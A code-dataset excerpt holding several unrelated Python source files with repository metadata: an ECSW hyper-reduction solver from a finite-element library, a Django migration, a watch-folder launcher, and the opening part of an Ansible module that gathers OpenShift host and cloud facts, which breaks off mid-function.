1c2c88ca6b1582f01056302f4059664684a16f5a | 121 | py | Python | backend/core/services/__init__.py | devalv/yawm | 9f91b96cf6b9a9a1f2026d514ea24edda117e1ba | [
"MIT"
] | 1 | 2021-12-26T00:10:15.000Z | 2021-12-26T00:10:15.000Z | backend/core/services/__init__.py | devalv/yawm | 9f91b96cf6b9a9a1f2026d514ea24edda117e1ba | [
"MIT"
] | 7 | 2020-11-07T16:42:47.000Z | 2022-01-21T23:51:38.000Z | backend/core/services/__init__.py | devalv/yawm | 9f91b96cf6b9a9a1f2026d514ea24edda117e1ba | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""Project business logic."""
from .web import get_product_name
__all__ = ["get_product_name"]
| 17.285714 | 33 | 0.677686 |
from .web import get_product_name
__all__ = ["get_product_name"]
| true | true |
1c2c8cec61fdb4270ad2b309273d6a5fc2928f1a | 8,463 | py | Python | amfe/mor/hyper_red/ecsw.py | ma-kast/AMfe | 99686cc313fb8904a093fb42e6cf0b38f8cfd791 | [
"BSD-3-Clause"
] | null | null | null | amfe/mor/hyper_red/ecsw.py | ma-kast/AMfe | 99686cc313fb8904a093fb42e6cf0b38f8cfd791 | [
"BSD-3-Clause"
] | null | null | null | amfe/mor/hyper_red/ecsw.py | ma-kast/AMfe | 99686cc313fb8904a093fb42e6cf0b38f8cfd791 | [
"BSD-3-Clause"
] | null | null | null | """
TODO: Write introduction to ECSW
"""
import logging
import numpy as np
from scipy.linalg import solve as linsolve
from scipy.sparse import csc_matrix
from .ecsw_assembly import EcswAssembly
__all__ = ['sparse_nnls',
'ecsw_assemble_G_and_b',
'ecsw_get_weights_by_component',
'EcswAssembly']
def sparse_nnls(G, b, tau, conv_stats=True):
r"""
Run the sparse NNLS-solver in order to find a sparse vector xi satisfying
.. math::
|| G \xi - b ||_2 \leq \tau ||b||_2 \quad\text{with}\quad \min||\xi||_0
Parameters
----------
G : ndarray, shape: (n*m, no_of_elements)
force contribution matrix
b : ndarray, shape: (n*m)
force contribution vector
tau : float
tolerance
conv_stats : bool
Flag for setting, that more detailed output is produced with
convergence information.
Returns
-------
x : csc_matrix
sparse vector containing the weights
stats : ndarray
Infos about the convergence of the system. The first column shows the
size of the active set, the second column the residual. If conv_info is
set to False, an empty array is returned.
References
----------
.. [1] C. L. Lawson and R. J. Hanson. Solving least squares problems,
volume 15. SIAM, 1995.
.. [2] T. Chapman, P. Avery, P. Collins, and C. Farhat. Accelerated mesh
sampling for the hyper reduction of nonlinear computational models.
International Journal for Numerical Methods in Engineering, 2016.
"""
no_of_elements = G.shape[1]
norm_b = np.linalg.norm(b)
r = b
xi = np.zeros(no_of_elements) # the resulting vector
zeta = np.zeros(no_of_elements) # the trial vector which is iterated over
# Boolean active set; allows quick and easys indexing through masking with
# high performance at the same time
active_set = np.zeros(no_of_elements, dtype=bool)
stats = []
while np.linalg.norm(r) > tau * norm_b:
mu = G.T @ r
idx = np.argmax(mu)
if active_set[idx] == True:
raise RuntimeError('snnls: The index has {} has already been added and is considered to be the best again.')
active_set[idx] = True
print('Added element {}'.format(idx))
while True:
# Trial vector zeta is solved for the sparse solution
zeta[~active_set] = 0.0
G_red = G[:, active_set]
zeta[active_set] = linsolve(G_red.T @ G_red, G_red.T @ b)
# check, if gathered solution is full positive
if np.min(zeta[active_set]) >= 0.0:
xi[:] = zeta[:]
break
# remove the negative elements from the active set
# Get all elements which violate the constraint, i.e. are in the
# active set and are smaller than zero
mask = np.logical_and(zeta <= 0.0, active_set)
ele_const = np.argmin(xi[mask] / (xi[mask] - zeta[mask]))
const_idx = np.where(mask)[0][ele_const]
print('Remove element {} '.format(const_idx) +
'violating the constraint.')
# Amplify xi with the difference of zeta and xi such, that the
# largest mismatching negative point becomes zero.
alpha = np.min(xi[mask] / (xi[mask] - zeta[mask]))
xi += alpha * (zeta - xi)
# Set active set manually as otherwise floating point roundoff
# errors are not considered.
# active_set = xi != 0
active_set[const_idx] = False
r = b - G[:, active_set] @ xi[active_set]
logger = logging.getLogger('amfe.hyper_red.ecsw.snnls')
logger.debug("snnls: residual {} No of active elements: {}".format(np.linalg.norm(r), len(np.where(xi)[0])))
if conv_stats:
stats.append((len(np.where(xi)[0]), np.linalg.norm(r)))
# sp.optimize.nnls(A, b)
indices = np.where(xi)[0] # remove the nasty tuple from np.where()
xi_red = xi[active_set]
indptr = np.array([0, len(xi_red)])
x = csc_matrix((xi_red, indices, indptr), shape=(G.shape[1], 1))
if conv_stats and not stats:
stats.append((0, np.linalg.norm(r)))
stats = np.array(stats)
return x, stats
def ecsw_assemble_G_and_b(component, S, W, timesteps=None):
"""
Assembles the element contribution matrix G for the given snapshots S.
This function is needed for cubature bases Hyper reduction methods
like the ECSW.
Parameters
----------
component : amfe.MeshComponent
amfe.Component, if a reduction basis should be used, it should already
be the component that is reduced by this reduction basis
S : ndarray, shape (no_of_dofs, no_of_snapshots)
Snapshots gathered as column vectors.
W : ndarray
projection matrix
timesteps : ndarray, shape(no_of_snapshots)
the timesteps of where the snapshots have been generated can be passed,
this is important for systems with certain constraints
Returns
-------
G : ndarray, shape (n*m, no_of_elements)
Contribution matrix of internal forces. The columns form the
internal force contributions on the basis V for the m snapshots
gathered in S.
b : ndarray, shape (n*m, )
summed force contribution
Note
----
This assembly works on constrained variables
"""
# Check the raw dimension
# Currently not applicable
# assert(component.no_of_dofs == S.shape[0])
logger = logging.getLogger('amfe.hyper_red.ecsw.ecsw_assemble_G_and_b')
if timesteps is None:
timesteps = np.zeros(S.shape[1], dtype=float)
no_of_dofs, no_of_snapshots = S.shape
no_of_reduced_dofs = W.shape[1]
no_of_elements = component.no_of_elements
logger.info('Start building large selection matrix G. In total {0:d} elements are treated:'.format(
no_of_elements))
G = np.zeros((no_of_reduced_dofs*no_of_snapshots, no_of_elements))
# Temporarily replace Assembly of component:
old_assembly = component.assembly
g_assembly = EcswAssembly([], [])
component.assembly = g_assembly
# Weight only one element by one
g_assembly.weights = [1.0]
# Set dq and ddq = 0
dq = np.zeros(no_of_dofs)
# loop over all elements
for element_no in range(no_of_elements):
# Change nonzero weighted elements to current element
g_assembly.indices = [element_no]
logger.debug('Assemble element {:10d} / {:10d}'.format(element_no+1, no_of_elements))
# loop over all snapshots
for snapshot_number, (snapshot_vector, t) in enumerate(zip(S.T, timesteps)):
G[snapshot_number*no_of_reduced_dofs:(snapshot_number+1)*no_of_reduced_dofs, element_no] = W.T @ component.f_int(snapshot_vector,
dq, t)
b = np.sum(G, axis=1)
# reset assembly
component.assembly = old_assembly
return G, b
def ecsw_get_weights_by_component(component, S, W, timesteps=None, tau=0.001, conv_stats=True):
"""
Reduce the given MeshComponent
Parameters
----------
component : instance of MeshComponent
MeshComponent
S : ndarray, shape (no_of_dofs, no_of_snapshots)
Snapshots
W : ndarray
projection basis
timesteps : ndarray, optional
timesteps of the training snapshots
if None, all timesteps will be set to zero
tau : float
tolerance of the ECSW reduction
conv_stats : bool
Flag if conv_stats shall be collected
Returns
-------
weights : ndarray
ecsw weights
indices : ndarray
row based indices of elements that have non-zero weights
stats : ndarray
convergence stats of the snnls solver
"""
if timesteps is None:
timesteps = np.zeros(S.shape[1], dtype=float)
# Create G and b from snapshots:
G, b = ecsw_assemble_G_and_b(component, S, W, timesteps)
weights, indices, stats = ecsw_get_weights_by_G_and_b(G, b, tau, conv_stats)
return weights, indices, stats
def ecsw_get_weights_by_G_and_b(G, b, tau, conv_stats):
# Calculate indices and weights
x, stats = sparse_nnls(G, b, tau, conv_stats)
indices = x.indices
weights = x.data
return weights, indices, stats
| 33.717131 | 141 | 0.631455 |
import logging
import numpy as np
from scipy.linalg import solve as linsolve
from scipy.sparse import csc_matrix
from .ecsw_assembly import EcswAssembly
__all__ = ['sparse_nnls',
'ecsw_assemble_G_and_b',
'ecsw_get_weights_by_component',
'EcswAssembly']
def sparse_nnls(G, b, tau, conv_stats=True):
no_of_elements = G.shape[1]
norm_b = np.linalg.norm(b)
r = b
xi = np.zeros(no_of_elements)
zeta = np.zeros(no_of_elements)
active_set = np.zeros(no_of_elements, dtype=bool)
stats = []
while np.linalg.norm(r) > tau * norm_b:
mu = G.T @ r
idx = np.argmax(mu)
if active_set[idx] == True:
raise RuntimeError('snnls: The index has {} has already been added and is considered to be the best again.')
active_set[idx] = True
print('Added element {}'.format(idx))
while True:
zeta[~active_set] = 0.0
G_red = G[:, active_set]
zeta[active_set] = linsolve(G_red.T @ G_red, G_red.T @ b)
if np.min(zeta[active_set]) >= 0.0:
xi[:] = zeta[:]
break
mask = np.logical_and(zeta <= 0.0, active_set)
ele_const = np.argmin(xi[mask] / (xi[mask] - zeta[mask]))
const_idx = np.where(mask)[0][ele_const]
print('Remove element {} '.format(const_idx) +
'violating the constraint.')
alpha = np.min(xi[mask] / (xi[mask] - zeta[mask]))
xi += alpha * (zeta - xi)
active_set[const_idx] = False
r = b - G[:, active_set] @ xi[active_set]
logger = logging.getLogger('amfe.hyper_red.ecsw.snnls')
logger.debug("snnls: residual {} No of active elements: {}".format(np.linalg.norm(r), len(np.where(xi)[0])))
if conv_stats:
stats.append((len(np.where(xi)[0]), np.linalg.norm(r)))
indices = np.where(xi)[0]
xi_red = xi[active_set]
indptr = np.array([0, len(xi_red)])
x = csc_matrix((xi_red, indices, indptr), shape=(G.shape[1], 1))
if conv_stats and not stats:
stats.append((0, np.linalg.norm(r)))
stats = np.array(stats)
return x, stats
def ecsw_assemble_G_and_b(component, S, W, timesteps=None):
logger = logging.getLogger('amfe.hyper_red.ecsw.ecsw_assemble_G_and_b')
if timesteps is None:
timesteps = np.zeros(S.shape[1], dtype=float)
no_of_dofs, no_of_snapshots = S.shape
no_of_reduced_dofs = W.shape[1]
no_of_elements = component.no_of_elements
logger.info('Start building large selection matrix G. In total {0:d} elements are treated:'.format(
no_of_elements))
G = np.zeros((no_of_reduced_dofs*no_of_snapshots, no_of_elements))
old_assembly = component.assembly
g_assembly = EcswAssembly([], [])
component.assembly = g_assembly
g_assembly.weights = [1.0]
dq = np.zeros(no_of_dofs)
for element_no in range(no_of_elements):
g_assembly.indices = [element_no]
logger.debug('Assemble element {:10d} / {:10d}'.format(element_no+1, no_of_elements))
for snapshot_number, (snapshot_vector, t) in enumerate(zip(S.T, timesteps)):
G[snapshot_number*no_of_reduced_dofs:(snapshot_number+1)*no_of_reduced_dofs, element_no] = W.T @ component.f_int(snapshot_vector,
dq, t)
b = np.sum(G, axis=1)
component.assembly = old_assembly
return G, b
def ecsw_get_weights_by_component(component, S, W, timesteps=None, tau=0.001, conv_stats=True):
if timesteps is None:
timesteps = np.zeros(S.shape[1], dtype=float)
G, b = ecsw_assemble_G_and_b(component, S, W, timesteps)
weights, indices, stats = ecsw_get_weights_by_G_and_b(G, b, tau, conv_stats)
return weights, indices, stats
def ecsw_get_weights_by_G_and_b(G, b, tau, conv_stats):
x, stats = sparse_nnls(G, b, tau, conv_stats)
indices = x.indices
weights = x.data
return weights, indices, stats
| true | true |
1c2c8ddf97baa004278da14041b5822beda019fc | 740 | py | Python | cobl/lexicon/migrations/0120_auto_20161019_1545.py | Bibiko/CoBL-public | 5092a0d01b7a13565c7da6bf2f6c52d648a2debe | [
"BSD-2-Clause"
] | 3 | 2017-05-30T04:40:43.000Z | 2019-04-25T14:54:54.000Z | cobl/lexicon/migrations/0120_auto_20161019_1545.py | Bibiko/CoBL-public | 5092a0d01b7a13565c7da6bf2f6c52d648a2debe | [
"BSD-2-Clause"
] | null | null | null | cobl/lexicon/migrations/0120_auto_20161019_1545.py | Bibiko/CoBL-public | 5092a0d01b7a13565c7da6bf2f6c52d648a2debe | [
"BSD-2-Clause"
] | 3 | 2018-07-02T13:42:12.000Z | 2019-05-17T13:11:13.000Z | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('lexicon', '0119_remove_cognateclass_loansourceid'),
]
operations = [
migrations.AlterField(
model_name='cognateclass',
name='proposedAsCognateToScale',
field=models.IntegerField(
default=0,
choices=[(0, b'1/6=small minority view'),
(1, b'2/6=sig. minority view'),
(2, b'3/6=50/50 balance'),
(3, b'4/6=small majority view'),
(4, b'5/6=large majority view')]),
),
]
| 28.461538 | 61 | 0.518919 |
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('lexicon', '0119_remove_cognateclass_loansourceid'),
]
operations = [
migrations.AlterField(
model_name='cognateclass',
name='proposedAsCognateToScale',
field=models.IntegerField(
default=0,
choices=[(0, b'1/6=small minority view'),
(1, b'2/6=sig. minority view'),
(2, b'3/6=50/50 balance'),
(3, b'4/6=small majority view'),
(4, b'5/6=large majority view')]),
),
]
| true | true |
1c2c8eb6ba2fb4178d3ed64ed477ad73d3a1a5ea | 887 | py | Python | watchfolders.py | leith-bartrich/fiellc | 1c02690538f442dede5d6afc8926355cb2ac838e | [
"MIT"
] | null | null | null | watchfolders.py | leith-bartrich/fiellc | 1c02690538f442dede5d6afc8926355cb2ac838e | [
"MIT"
] | null | null | null | watchfolders.py | leith-bartrich/fiellc | 1c02690538f442dede5d6afc8926355cb2ac838e | [
"MIT"
] | null | null | null | from fiepipedesktoplib.gitstorage.shells import Shell as AssetShell, ContainerIDVariableCommand, AssetIDVarCommand, \
RootIDVarCommand
from fiepipedesktoplib.watchfolder.shell.watchfolder import WatchFolderShellApplication as WatcherShell
_CONTAINER_ID = "9341cf7f-5f48-4971-aece-a5f203c23076"
_ROOT_ID = "e00a2013-9041-4570-bc88-ac31bcd3e36e"
_ASSET_ID = "aadc8b52-afa1-4525-a182-40841d2baa54"
def _get_asset_shell() -> AssetShell:
cont_var = ContainerIDVariableCommand(_CONTAINER_ID)
root_var = RootIDVarCommand(_ROOT_ID)
asset_var = AssetIDVarCommand(_ASSET_ID)
return AssetShell(cont_var, root_var, asset_var)
def get_watcher_shell() -> WatcherShell:
return WatcherShell(_get_asset_shell())
def docs():
shell = get_watcher_shell()
shell.onecmd("start_documents")
def icloud():
shell = get_watcher_shell()
shell.onecmd("start_icloud")
| 30.586207 | 117 | 0.78805 | from fiepipedesktoplib.gitstorage.shells import Shell as AssetShell, ContainerIDVariableCommand, AssetIDVarCommand, \
RootIDVarCommand
from fiepipedesktoplib.watchfolder.shell.watchfolder import WatchFolderShellApplication as WatcherShell
_CONTAINER_ID = "9341cf7f-5f48-4971-aece-a5f203c23076"
_ROOT_ID = "e00a2013-9041-4570-bc88-ac31bcd3e36e"
_ASSET_ID = "aadc8b52-afa1-4525-a182-40841d2baa54"
def _get_asset_shell() -> AssetShell:
cont_var = ContainerIDVariableCommand(_CONTAINER_ID)
root_var = RootIDVarCommand(_ROOT_ID)
asset_var = AssetIDVarCommand(_ASSET_ID)
return AssetShell(cont_var, root_var, asset_var)
def get_watcher_shell() -> WatcherShell:
return WatcherShell(_get_asset_shell())
def docs():
shell = get_watcher_shell()
shell.onecmd("start_documents")
def icloud():
shell = get_watcher_shell()
shell.onecmd("start_icloud")
| true | true |
1c2c91a5ae3808e2dbe2282c8d8978e7e8dc1c85 | 100,045 | py | Python | roles/openshift_facts/library/openshift_facts.py | sqtran/openshift-ansible | b06a457440aa929959164ecfc11ce9edf86bdc6a | [
"Apache-2.0"
] | null | null | null | roles/openshift_facts/library/openshift_facts.py | sqtran/openshift-ansible | b06a457440aa929959164ecfc11ce9edf86bdc6a | [
"Apache-2.0"
] | null | null | null | roles/openshift_facts/library/openshift_facts.py | sqtran/openshift-ansible | b06a457440aa929959164ecfc11ce9edf86bdc6a | [
"Apache-2.0"
] | 1 | 2020-12-02T00:39:02.000Z | 2020-12-02T00:39:02.000Z | #!/usr/bin/python
# pylint: disable=too-many-lines
# -*- coding: utf-8 -*-
# Reason: Disable pylint too-many-lines because we don't want to split up this file.
# Status: Permanently disabled to keep this module as self-contained as possible.
"""Ansible module for retrieving and setting openshift related facts"""
# pylint: disable=no-name-in-module, import-error, wrong-import-order
import copy
import errno
import json
import re
import io
import os
import yaml
import struct
import socket
from distutils.util import strtobool
from distutils.version import LooseVersion
from ansible.module_utils.six import string_types, text_type
from ansible.module_utils.six.moves import configparser
# ignore pylint errors related to the module_utils import
# pylint: disable=redefined-builtin, unused-wildcard-import, wildcard-import
# import module snippets
from ansible.module_utils.basic import * # noqa: F403
from ansible.module_utils.facts import * # noqa: F403
from ansible.module_utils.urls import * # noqa: F403
from ansible.module_utils.six import iteritems, itervalues
from ansible.module_utils.six.moves.urllib.parse import urlparse, urlunparse
from ansible.module_utils._text import to_native
HAVE_DBUS = False
try:
from dbus import SystemBus, Interface
from dbus.exceptions import DBusException
HAVE_DBUS = True
except ImportError:
pass
DOCUMENTATION = '''
---
module: openshift_facts
short_description: Cluster Facts
author: Jason DeTiberus
requirements: [ ]
'''
EXAMPLES = '''
'''
def migrate_docker_facts(facts):
""" Apply migrations for docker facts """
params = {
'common': (
'additional_registries',
'insecure_registries',
'blocked_registries',
'options'
),
'node': (
'log_driver',
'log_options'
)
}
if 'docker' not in facts:
facts['docker'] = {}
# pylint: disable=consider-iterating-dictionary
for role in params.keys():
if role in facts:
for param in params[role]:
old_param = 'docker_' + param
if old_param in facts[role]:
facts['docker'][param] = facts[role].pop(old_param)
if 'node' in facts and 'portal_net' in facts['node']:
facts['docker']['hosted_registry_network'] = facts['node'].pop('portal_net')
# log_options was originally meant to be a comma separated string, but
# we now prefer an actual list, with backward compatibility:
if 'log_options' in facts['docker'] and \
isinstance(facts['docker']['log_options'], string_types):
facts['docker']['log_options'] = facts['docker']['log_options'].split(",")
return facts
# TODO: We should add a generic migration function that takes source and destination
# paths and does the right thing rather than one function for common, one for node, etc.
def migrate_common_facts(facts):
""" Migrate facts from various roles into common """
params = {
'node': ('portal_net'),
'master': ('portal_net')
}
if 'common' not in facts:
facts['common'] = {}
# pylint: disable=consider-iterating-dictionary
for role in params.keys():
if role in facts:
for param in params[role]:
if param in facts[role]:
facts['common'][param] = facts[role].pop(param)
return facts
def migrate_node_facts(facts):
""" Migrate facts from various roles into node """
params = {
'common': ('dns_ip'),
}
if 'node' not in facts:
facts['node'] = {}
# pylint: disable=consider-iterating-dictionary
for role in params.keys():
if role in facts:
for param in params[role]:
if param in facts[role]:
facts['node'][param] = facts[role].pop(param)
return facts
def migrate_hosted_facts(facts):
""" Apply migrations for master facts """
if 'master' in facts:
if 'router_selector' in facts['master']:
if 'hosted' not in facts:
facts['hosted'] = {}
if 'router' not in facts['hosted']:
facts['hosted']['router'] = {}
facts['hosted']['router']['selector'] = facts['master'].pop('router_selector')
if 'registry_selector' in facts['master']:
if 'hosted' not in facts:
facts['hosted'] = {}
if 'registry' not in facts['hosted']:
facts['hosted']['registry'] = {}
facts['hosted']['registry']['selector'] = facts['master'].pop('registry_selector')
return facts
def migrate_admission_plugin_facts(facts):
""" Apply migrations for admission plugin facts """
if 'master' in facts:
if 'kube_admission_plugin_config' in facts['master']:
if 'admission_plugin_config' not in facts['master']:
facts['master']['admission_plugin_config'] = dict()
# Merge existing kube_admission_plugin_config with admission_plugin_config.
facts['master']['admission_plugin_config'] = merge_facts(facts['master']['admission_plugin_config'],
facts['master']['kube_admission_plugin_config'],
additive_facts_to_overwrite=[],
protected_facts_to_overwrite=[])
# Remove kube_admission_plugin_config fact
facts['master'].pop('kube_admission_plugin_config', None)
return facts
def migrate_local_facts(facts):
""" Apply migrations of local facts """
migrated_facts = copy.deepcopy(facts)
migrated_facts = migrate_docker_facts(migrated_facts)
migrated_facts = migrate_common_facts(migrated_facts)
migrated_facts = migrate_node_facts(migrated_facts)
migrated_facts = migrate_hosted_facts(migrated_facts)
migrated_facts = migrate_admission_plugin_facts(migrated_facts)
return migrated_facts
def first_ip(network):
""" Return the first IPv4 address in network
Args:
network (str): network in CIDR format
Returns:
str: first IPv4 address
"""
atoi = lambda addr: struct.unpack("!I", socket.inet_aton(addr))[0] # noqa: E731
itoa = lambda addr: socket.inet_ntoa(struct.pack("!I", addr)) # noqa: E731
(address, netmask) = network.split('/')
netmask_i = (0xffffffff << (32 - atoi(netmask))) & 0xffffffff
return itoa((atoi(address) & netmask_i) + 1)
def hostname_valid(hostname):
""" Test if specified hostname should be considered valid
Args:
hostname (str): hostname to test
Returns:
bool: True if valid, otherwise False
"""
if (not hostname or
hostname.startswith('localhost') or
hostname.endswith('localdomain') or
# OpenShift will not allow a node with more than 63 chars in name.
len(hostname) > 63):
return False
return True
def choose_hostname(hostnames=None, fallback=''):
""" Choose a hostname from the provided hostnames
Given a list of hostnames and a fallback value, choose a hostname to
use. This function will prefer fqdns if they exist (excluding any that
begin with localhost or end with localdomain) over ip addresses.
Args:
hostnames (list): list of hostnames
fallback (str): default value to set if hostnames does not contain
a valid hostname
Returns:
str: chosen hostname
"""
hostname = fallback
if hostnames is None:
return hostname
ip_regex = r'\A\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\Z'
ips = [i for i in hostnames if i is not None and isinstance(i, string_types) and re.match(ip_regex, i)]
hosts = [i for i in hostnames if i is not None and i != '' and i not in ips]
for host_list in (hosts, ips):
for host in host_list:
if hostname_valid(host):
return host
return hostname
def query_metadata(metadata_url, headers=None, expect_json=False):
""" Return metadata from the provided metadata_url
Args:
metadata_url (str): metadata url
headers (dict): headers to set for metadata request
expect_json (bool): does the metadata_url return json
Returns:
dict or list: metadata request result
"""
result, info = fetch_url(module, metadata_url, headers=headers) # noqa: F405
if info['status'] != 200:
raise OpenShiftFactsMetadataUnavailableError("Metadata unavailable")
if expect_json:
return module.from_json(to_native(result.read())) # noqa: F405
else:
return [to_native(line.strip()) for line in result.readlines()]
def walk_metadata(metadata_url, headers=None, expect_json=False):
""" Walk the metadata tree and return a dictionary of the entire tree
Args:
metadata_url (str): metadata url
headers (dict): headers to set for metadata request
expect_json (bool): does the metadata_url return json
Returns:
dict: the result of walking the metadata tree
"""
metadata = dict()
for line in query_metadata(metadata_url, headers, expect_json):
if line.endswith('/') and not line == 'public-keys/':
key = line[:-1]
metadata[key] = walk_metadata(metadata_url + line,
headers, expect_json)
else:
results = query_metadata(metadata_url + line, headers,
expect_json)
if len(results) == 1:
# disable pylint maybe-no-member because overloaded use of
# the module name causes pylint to not detect that results
# is an array or hash
# pylint: disable=maybe-no-member
metadata[line] = results.pop()
else:
metadata[line] = results
return metadata
def get_provider_metadata(metadata_url, supports_recursive=False,
headers=None, expect_json=False):
""" Retrieve the provider metadata
Args:
metadata_url (str): metadata url
supports_recursive (bool): does the provider metadata api support
recursion
headers (dict): headers to set for metadata request
expect_json (bool): does the metadata_url return json
Returns:
dict: the provider metadata
"""
try:
if supports_recursive:
metadata = query_metadata(metadata_url, headers,
expect_json)
else:
metadata = walk_metadata(metadata_url, headers,
expect_json)
except OpenShiftFactsMetadataUnavailableError:
metadata = None
return metadata
def normalize_gce_facts(metadata, facts):
""" Normalize gce facts
Args:
metadata (dict): provider metadata
facts (dict): facts to update
Returns:
dict: the result of adding the normalized metadata to the provided
facts dict
"""
for interface in metadata['instance']['networkInterfaces']:
int_info = dict(ips=[interface['ip']], network_type='gce')
int_info['public_ips'] = [ac['externalIp'] for ac
in interface['accessConfigs']]
int_info['public_ips'].extend(interface['forwardedIps'])
_, _, network_id = interface['network'].rpartition('/')
int_info['network_id'] = network_id
facts['network']['interfaces'].append(int_info)
_, _, zone = metadata['instance']['zone'].rpartition('/')
facts['zone'] = zone
# GCE currently only supports a single interface
facts['network']['ip'] = facts['network']['interfaces'][0]['ips'][0]
pub_ip = facts['network']['interfaces'][0]['public_ips'][0]
facts['network']['public_ip'] = pub_ip
# Split instance hostname from GCE metadata to use the short instance name
facts['network']['hostname'] = metadata['instance']['hostname'].split('.')[0]
# TODO: attempt to resolve public_hostname
facts['network']['public_hostname'] = facts['network']['public_ip']
return facts
def normalize_aws_facts(metadata, facts):
""" Normalize aws facts
Args:
metadata (dict): provider metadata
facts (dict): facts to update
Returns:
dict: the result of adding the normalized metadata to the provided
facts dict
"""
for interface in sorted(
metadata['network']['interfaces']['macs'].values(),
key=lambda x: x['device-number']
):
int_info = dict()
var_map = {'ips': 'local-ipv4s', 'public_ips': 'public-ipv4s'}
for ips_var, int_var in iteritems(var_map):
ips = interface.get(int_var)
if isinstance(ips, string_types):
int_info[ips_var] = [ips]
else:
int_info[ips_var] = ips
if 'vpc-id' in interface:
int_info['network_type'] = 'vpc'
else:
int_info['network_type'] = 'classic'
if int_info['network_type'] == 'vpc':
int_info['network_id'] = interface['subnet-id']
else:
int_info['network_id'] = None
facts['network']['interfaces'].append(int_info)
facts['zone'] = metadata['placement']['availability-zone']
# TODO: actually attempt to determine default local and public ips
# by using the ansible default ip fact and the ipv4-associations
# from the ec2 metadata
facts['network']['ip'] = metadata.get('local-ipv4')
facts['network']['public_ip'] = metadata.get('public-ipv4')
# TODO: verify that local hostname makes sense and is resolvable
facts['network']['hostname'] = metadata.get('local-hostname')
# TODO: verify that public hostname makes sense and is resolvable
facts['network']['public_hostname'] = metadata.get('public-hostname')
return facts
def normalize_openstack_facts(metadata, facts):
""" Normalize openstack facts
Args:
metadata (dict): provider metadata
facts (dict): facts to update
Returns:
dict: the result of adding the normalized metadata to the provided
facts dict
"""
# openstack ec2 compat api does not support network interfaces and
# the version tested on did not include the info in the openstack
# metadata api, should be updated if neutron exposes this.
facts['zone'] = metadata['availability_zone']
local_ipv4 = metadata['ec2_compat']['local-ipv4'].split(',')[0]
facts['network']['ip'] = local_ipv4
facts['network']['public_ip'] = metadata['ec2_compat']['public-ipv4']
for f_var, h_var, ip_var in [('hostname', 'hostname', 'local-ipv4'),
('public_hostname', 'public-hostname', 'public-ipv4')]:
try:
if socket.gethostbyname(metadata['ec2_compat'][h_var]) == metadata['ec2_compat'][ip_var]:
facts['network'][f_var] = metadata['ec2_compat'][h_var]
else:
facts['network'][f_var] = metadata['ec2_compat'][ip_var]
except socket.gaierror:
facts['network'][f_var] = metadata['ec2_compat'][ip_var]
return facts
def normalize_provider_facts(provider, metadata):
""" Normalize provider facts
Args:
provider (str): host provider
metadata (dict): provider metadata
Returns:
dict: the normalized provider facts
"""
if provider is None or metadata is None:
return {}
# TODO: test for ipv6_enabled where possible (gce, aws do not support)
# and configure ipv6 facts if available
# TODO: add support for setting user_data if available
facts = dict(name=provider, metadata=metadata,
network=dict(interfaces=[], ipv6_enabled=False))
if provider == 'gce':
facts = normalize_gce_facts(metadata, facts)
elif provider == 'aws':
facts = normalize_aws_facts(metadata, facts)
elif provider == 'openstack':
facts = normalize_openstack_facts(metadata, facts)
return facts
def set_node_schedulability(facts):
""" Set schedulable facts if not already present in facts dict
Args:
facts (dict): existing facts
Returns:
dict: the facts dict updated with the generated schedulable
facts if they were not already present
"""
if 'node' in facts:
if 'schedulable' not in facts['node']:
if 'master' in facts:
facts['node']['schedulable'] = False
else:
facts['node']['schedulable'] = True
return facts
# pylint: disable=too-many-branches
def set_selectors(facts):
""" Set selectors facts if not already present in facts dict
Args:
facts (dict): existing facts
Returns:
dict: the facts dict updated with the generated selectors
facts if they were not already present
"""
selector = "region=infra"
if 'hosted' not in facts:
facts['hosted'] = {}
if 'router' not in facts['hosted']:
facts['hosted']['router'] = {}
if 'selector' not in facts['hosted']['router'] or facts['hosted']['router']['selector'] in [None, 'None']:
facts['hosted']['router']['selector'] = selector
if 'registry' not in facts['hosted']:
facts['hosted']['registry'] = {}
if 'selector' not in facts['hosted']['registry'] or facts['hosted']['registry']['selector'] in [None, 'None']:
facts['hosted']['registry']['selector'] = selector
if 'metrics' not in facts['hosted']:
facts['hosted']['metrics'] = {}
if 'selector' not in facts['hosted']['metrics'] or facts['hosted']['metrics']['selector'] in [None, 'None']:
facts['hosted']['metrics']['selector'] = None
if 'logging' not in facts:
facts['logging'] = {}
if 'selector' not in facts['logging'] or facts['logging']['selector'] in [None, 'None']:
facts['logging']['selector'] = None
if 'etcd' not in facts['hosted']:
facts['hosted']['etcd'] = {}
if 'selector' not in facts['hosted']['etcd'] or facts['hosted']['etcd']['selector'] in [None, 'None']:
facts['hosted']['etcd']['selector'] = None
return facts
def set_dnsmasq_facts_if_unset(facts):
""" Set dnsmasq facts if not already present in facts
Args:
facts (dict) existing facts
Returns:
facts (dict) updated facts with values set if not previously set
"""
if 'common' in facts:
if 'master' in facts and 'dns_port' not in facts['master']:
facts['master']['dns_port'] = 8053
return facts
def set_project_cfg_facts_if_unset(facts):
""" Set Project Configuration facts if not already present in facts dict
dict:
Args:
facts (dict): existing facts
Returns:
dict: the facts dict updated with the generated Project Configuration
facts if they were not already present
"""
config = {
'default_node_selector': '',
'project_request_message': '',
'project_request_template': '',
'mcs_allocator_range': 's0:/2',
'mcs_labels_per_project': 5,
'uid_allocator_range': '1000000000-1999999999/10000'
}
if 'master' in facts:
for key, value in config.items():
if key not in facts['master']:
facts['master'][key] = value
return facts
def set_identity_providers_if_unset(facts):
""" Set identity_providers fact if not already present in facts dict
Args:
facts (dict): existing facts
Returns:
dict: the facts dict updated with the generated identity providers
facts if they were not already present
"""
if 'master' in facts:
deployment_type = facts['common']['deployment_type']
if 'identity_providers' not in facts['master']:
identity_provider = dict(
name='allow_all', challenge=True, login=True,
kind='AllowAllPasswordIdentityProvider'
)
if deployment_type == 'openshift-enterprise':
identity_provider = dict(
name='deny_all', challenge=True, login=True,
kind='DenyAllPasswordIdentityProvider'
)
facts['master']['identity_providers'] = [identity_provider]
return facts
def set_url_facts_if_unset(facts):
""" Set url facts if not already present in facts dict
Args:
facts (dict): existing facts
Returns:
dict: the facts dict updated with the generated url facts if they
were not already present
"""
if 'master' in facts:
hostname = facts['common']['hostname']
cluster_hostname = facts['master'].get('cluster_hostname')
cluster_public_hostname = facts['master'].get('cluster_public_hostname')
public_hostname = facts['common']['public_hostname']
api_hostname = cluster_hostname if cluster_hostname else hostname
